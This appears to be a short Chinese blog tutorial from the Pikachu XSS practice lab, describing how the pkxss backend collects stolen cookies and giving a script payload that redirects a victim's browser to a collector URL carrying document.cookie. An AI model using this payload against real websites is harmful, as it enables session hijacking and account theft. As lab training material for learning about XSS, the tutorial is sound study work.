Pikichu-xss实验案例-通过xss获取cookie

原理图:

pikachu提供了一个pkxss后台;

该后台可以把获得的cookie信息显示出来;

查看后端代码cookie.php:就是获取cookie信息,保存起来,然后重定向跳转到目标页面;修改最后从定向的ip,改为自己测试用的IP地址;

对此,构造攻击payload, 获取到cookie ,然后从定向跳转到pkxss后台,pkxss后台把数据保存后,重新重定向回到被攻击的页面。

复制代码
<script>document.location='http://192.168.3.224:8082/pkxss/xcookie/cookie.php?cookie='+document.cookie;</script>
//192.168.3.224  代表pkxss 的后台   document.cookie表示获取被攻击平台的cookie
//拿到cookie后,重定向到pkxss后台把数据保存起来

得到攻击信息。

相关推荐
我是华为OD~HR~栗栗呀8 分钟前
华为OD-21届考研-Java面经
java·前端·c++·python·华为od·华为·面试
詩句☾⋆᭄南笙8 分钟前
CSS美化网页元素
前端·css·html
陈随易9 分钟前
不使用 Husky 和 Lint-staged,实现 Git 提交前自动格式化代码
前端·后端·程序员
范特东南西北风11 分钟前
roocode + vscode + api_key = free GPT-5
前端·ai编程
golang学习记11 分钟前
从0死磕全栈之Next.js 缓存与数据重新验证
前端
BraveAriesZyc12 分钟前
axios的使用
前端
没有鸡汤吃不下饭13 分钟前
H5移动端页面实现快递单号条形码/二维码扫描,亲测可行!!
前端·javascript·vue.js
云枫晖16 分钟前
JS核心知识-模块化
前端·javascript
Asort16 分钟前
JavaScript设计模式(十五)——解释器模式 (Interpreter)
前端·javascript·设计模式
GBVFtou20 分钟前
vue3 options模式
前端·vue.js